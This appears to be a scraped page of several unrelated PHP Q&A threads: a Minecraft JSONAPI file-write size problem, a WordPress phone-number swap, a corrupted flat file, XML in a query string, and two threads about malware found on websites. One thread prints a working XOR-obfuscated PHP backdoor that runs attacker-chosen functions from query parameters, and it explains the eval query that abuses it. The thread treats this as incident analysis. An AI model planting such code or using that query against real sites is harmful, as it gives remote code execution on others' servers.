I'm having this issue with the JSONAPI for minecraft. http://mcjsonapi.com/
I am trying to use the method "files.write" or "setFileContents" to replace the contents of a file. The website states this about the method.
Pretty simple. Just rewrites the file right? Yeah but this is proving to be more difficult then I thought. At first attempt, I was trying to set 3450 characters to the file "groups.yml" on the minecraft server. Here's the code I ran in PHP:
var_dump(
$api->call("files.write", array("plugins/GroupManager/worlds/world/groups.yml", (string)$yaml))
);
The var_dump is supposed to either return a success statement or an error describing what went wrong. But instead all I get is "null". This isn't right, and I know $yaml is being casted to a string, which isn't the issue. So I decide to start testing around. After much testing, I find that the character length of what I can set is exactly 1622. Adding another space or anything causes null, otherwise, it works. This is the modified file that is below 1622 characters I tested with.
So great, you found the issue, right? No, I didn't. I thought 1622 was an odd number to stop working, so I did some further testing. I tried to set 3000 characters I generated from just smashing my keyboard, and it worked! So what's going on here?
This and this works, but this doesn't. Why is this? This app called Adminium runs this exact API, and includes a file management system inside the app which I am assuming uses the same methods I am using, but it doesn't have a problem.
I have a forum post here that I also asked on, and still haven't gotten to an answer yet.
Related
Hi I found this code in my website files is this some kind of backdoor?can someone explain this code line by line
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Yes, this is malicious code.
Before spending any time looking at it, you should immediately take the site offline and replace it with a known-good copy, e.g. a backup or the official release. You should also make sure everything on your server is up to date and change your admin passwords. The fact that this code is there means your code was already compromised.
To confirm I'm not being over-dramatic, here's how the code works:
The first two lines generate a string containing the letters 'GET' by using bitwise XOR operations.
The third line then adds an '_' at the beginning, and executes $_GET["_"]($_GET["__"]);, echoing the result with <?=
This allows the attacker to access the page with a query string where _ is a function name and __ is its argument; PHP will run the function and display the result.
This in turn allows them to run any code they like, because they can just go to `/yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();
But to reiterate, the above is only to satisfy curiosity; this is a case where you should "shoot first, ask questions later". As soon as you've identified the code shouldn't be there, assume you've been compromised.
This is a strange one, but it seems like it should be really easy to solve.
I have a wordpress website Version 4.8.3. PHP 5.6.32.
Whenever I put in a specific value into the title field 6147989800 (or other fields) it get's swapped out on the front end with 8552226270.
I searched in every file on the server for some code (i suspect javascript) that is swapping out the numbers. No luck.
When I search the database the original number 6147989800 is there. But when I do a var_dump of the field is shows 8552226270 and it shows up as 8552226270 on the front end.
This switch happens when I put in 6147989800, 614.798.9800, and 614-798-9800.
I'm at a loss. Even stranger is that when I duplicate the website to a local instance and on a test server the swap doesn't happen.
Any ideas would be great. Thanks!
Thank you John Ellmore for your help. It did end up being a third party Javascript that was doing the phone swap.
I don't know how I missed it [smacks palm against forehead]
I use flat files on my website to store account information for my game. But now, gem collecting doesn't work anymore. The filesize of the "accounts.ini" file is 218,750 bytes and the bottom of it looks like this:
[117157336030342728342]
GEMS = 7
[112725622837339591876]
GEMS = "1 4"4"
As you can see, the last line is wrong for some reason. What is causing this? Did I hit the filesize limit?
EDIT: Well, I should have tried it before, but I edited the last line to normal and it started working again. But you're right, I should use a database for such things. I've tried using a database before, but I didn't like it back then, but I guess that's not a good reason not to use it. I was just told that I won't be able to reach the "php.ini" file. I don't think I can find it either. Anyways, I'll switch to a database now, thanks for the advice!
Today I've found a malware on one site, I have deleted it, of course, and everything is ok, but in order to understand where it comes from, I would like to understand its logic, but it is encoded, in a quite easy way. At the beginning of the file I see:
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
This is used then in all the rest of the file, as a dictionary of characters, from now on, there are all assignments like this:
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
Does anyone has a clue on how I can decode this (without infecting a server of mine, of course), or at least has the name of this type of encryption? Just to know if I can find something on the web.
If someone is interested, I can post the rest of the file, I found it odd.
Update: the file is actually a malicious shell hack. If you find it on your server, delete it and contact your sysadmin.
It is obfuscating the phrase "error_reporting"
<?php
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
echo $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
$GLOBALS['rpdxi45'] is storing a string constructed from the characters of the string held in $i96.
Echoing $GLOBALS['rpdxi45'] will show you the string that has been constructed.
See here: http://ideone.com/Jy1uty
I'm really unsure if this is even possible but we have an issue where we control an interface that is having XML posted in to it via HTTP post in the form of www.url.com/script.php?xml=<xmlgoeshere>. That is then URL encoded and passed in to us, and we decode and parse it.
Except I have one client who just refuses to url encode their incoming code, which works fine except for when the XML hits an ampersand, at which point everything is being parsed as an end of the xml variable.
www.url.com/script.php?xml=<xmlstart...foo&bar.../>
The end result being that I have XML being POST/GET'd into the xml variable as normal, and then I lose half of the incoming content because of the ampersand.
Now I know that's expected/proper behavior, my question is, is it possible to capture the &bar.../> segment of this code, so that if we hit a known error I can crowbar this into working anyways? I know this is non-ideal but I'm at my wit's end dealing with the outside party.
UPDATE
Ok so I was totally confused. After grabbing the server variables as mentioned below, it looks like I'm not getting the querystring, but that's because on the query they're submitting it has:
[CONTENT_TYPE] => application/x-www-form-urlencoded
[QUERY_STRING] =>
That being the case, is the above behavior still to be expected? Is their a way to get the raw form input in this case? Thanks to the below posters for their help
You'd be hard pressed to do it, if it's even possible, because the fragments of a query string take the format foo=bar with the & character acting as the separator. This means that you'd get an unpredictible $_GET variable created that would take the key name of everything between the & and the next = (assuming there even is one) that would take the value from the = to the next & or the end of the string.
It might be possible to attempt to parse the $_GET array in some way to recover the lost meaning but it would never be all that reliable. You might have more luck trying to parse $_SERVER ['QUERY_STRING'], but that's not guaranteed to succeed either, and would be a hell of a lot of effort for a problem that can be avoided just by the client using the API properly.
And for me, that's the main point. If your client refuses to use your API in the way you tell them to use it, then it's ultimately their problem if it doesn't work, not yours. Of course you should accommodate your clients to a reasonable standard, but that doesn't mean bending over backwards for them just because they refuse to accommodate your needs or technical standards that have been laid down for the good of everyone.
If the only parameter you use is xml=, and it's always at the front, and there are no other parameters, you can do something like this pseudocode:
if (count($_GET)>1 or is_not_well_formed_xml($_GET['xml'])) {
$xml = substr($_SERVER['QUERY_STRING'], 4);
if (is_not_well_formed_xml($xml)) {
really_fail();
}
}
However, you should tell the client to fix their code, especially since it's so easy for them to comply with the standard! You might still get trouble if the xml contains a ? or a #, since php or the web server may get confused about where the query string starts (messing up your $_SERVER['QUERY_STRING'], and either PHP, the client's code or an intermediary proxy or web server may get confused about the #, because that usually is the beginning of a fragment.
E.g., Something like this might be impossible to transmit reliably in a query parameter:
<root><link href="http://example.org/?querystring#fragment"/></root>
So tell them to fix their code. It's almost certainly incredibly easy for them to do so!
UPDATE
There's some confusion about whether this is a GET or POST. If they send a POST with x-www-form-urlencoded body, you can substitute file_get_contents('php://input') for $_SERVER['QUERY_STRING'] in the code above.
YES, Its possible. Using $_SERVER["QUERY_STRING"].
For your url www.url.com/script.php?xml=<xmlstart...foo&bar.../>, $_SERVER["QUERY_STRING"] should contain, xml=<xmlstart...foo&bar.../>;
The following code should extract the xml data.
$pos=strpos($_SERVER["QUERY_STRING"], 'xml');
$xml="";
if($pos!==false){
$xml = substr($_SERVER["QUERY_STRING"], $pos+strlen("xml="));
}
The problem here is that the query string will be parsed for & and = characters. If you know where your = character will be after the "bar" key then you may be able to capture the value of the rest of the string. However if you hit more & you are going to need to know the full content of the incoming message body. If you do then you should be able to get the rest of the content.